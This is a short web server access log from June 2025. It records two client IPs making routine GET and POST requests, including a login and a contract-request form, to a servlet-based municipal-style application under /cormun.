190.95.67.99 - - [17/Jun/2025:16:36:08 -0300] "POST /cormun/servlet/trsolicitudot?0bed09e221ec9f64d9376b34f24e3660,,gx-no-cache=1750189087780 HTTP/1.1" 200 13743
190.95.67.99 - - [17/Jun/2025:16:36:33 -0300] "POST /cormun/servlet/trsolicitudot?0bed09e221ec9f64d9376b34f24e3660,,gx-no-cache=1750189112074 HTTP/1.1" 200 25175
190.95.67.99 - - [17/Jun/2025:16:36:36 -0300] "POST /cormun/servlet/trsolicitudot?0bed09e221ec9f64d9376b34f24e3660,,gx-no-cache=1750189115508 HTTP/1.1" 200 10779
190.95.67.99 - - [17/Jun/2025:16:36:50 -0300] "POST /cormun/servlet/trsolicitudot?0bed09e221ec9f64d9376b34f24e3660,,gx-no-cache=1750189129546 HTTP/1.1" 200 25043
148.222.218.189 - - [17/Jun/2025:16:37:08 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1719
148.222.218.189 - - [17/Jun/2025:16:37:08 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1729
148.222.218.189 - - [17/Jun/2025:16:37:08 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
148.222.218.189 - - [17/Jun/2025:16:37:10 -0300] "POST /cormun/servlet/hlogin?72c351230922d242a9a8b7cce2aa83ee,gx-no-cache=1750189148381 HTTP/1.1" 200 90
148.222.218.189 - - [17/Jun/2025:16:37:11 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 949
148.222.218.189 - - [17/Jun/2025:16:37:11 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4332
148.222.218.189 - - [17/Jun/2025:16:37:19 -0300] "GET /cormun/servlet/trcontratosolicitud? HTTP/1.1" 200 14803
148.222.218.189 - - [17/Jun/2025:16:37:19 -0300] "GET /cormun/static/gxcfg.js?202211298514361 HTTP/1.1" 200 953
148.222.218.189 - - [17/Jun/2025:16:37:19 -0300] "GET /cormun/static/trcontratosolicitud.js?202211298514531 HTTP/1.1" 200 28237
148.222.218.189 - - [17/Jun/2025:16:37:19 -0300] "GET /cormun//static/Resources/PXToolsGridNew.png HTTP/1.1" 200 427
190.95.67.99 - - [17/Jun/2025:16:37:20 -0300] "POST /cormun/servlet/trsolicitudot?0bed09e221ec9f64d9376b34f24e3660,,gx-no-cache=1750189159924 HTTP/1.1" 200 10776
190.95.67.99 - - [17/Jun/2025:16:37:55 -0300] "POST /cormun/servlet/trsolicitudot?0bed09e221ec9f64d9376b34f24e3660,,gx-no-cache=1750189193882 HTTP/1.1" 200 25177
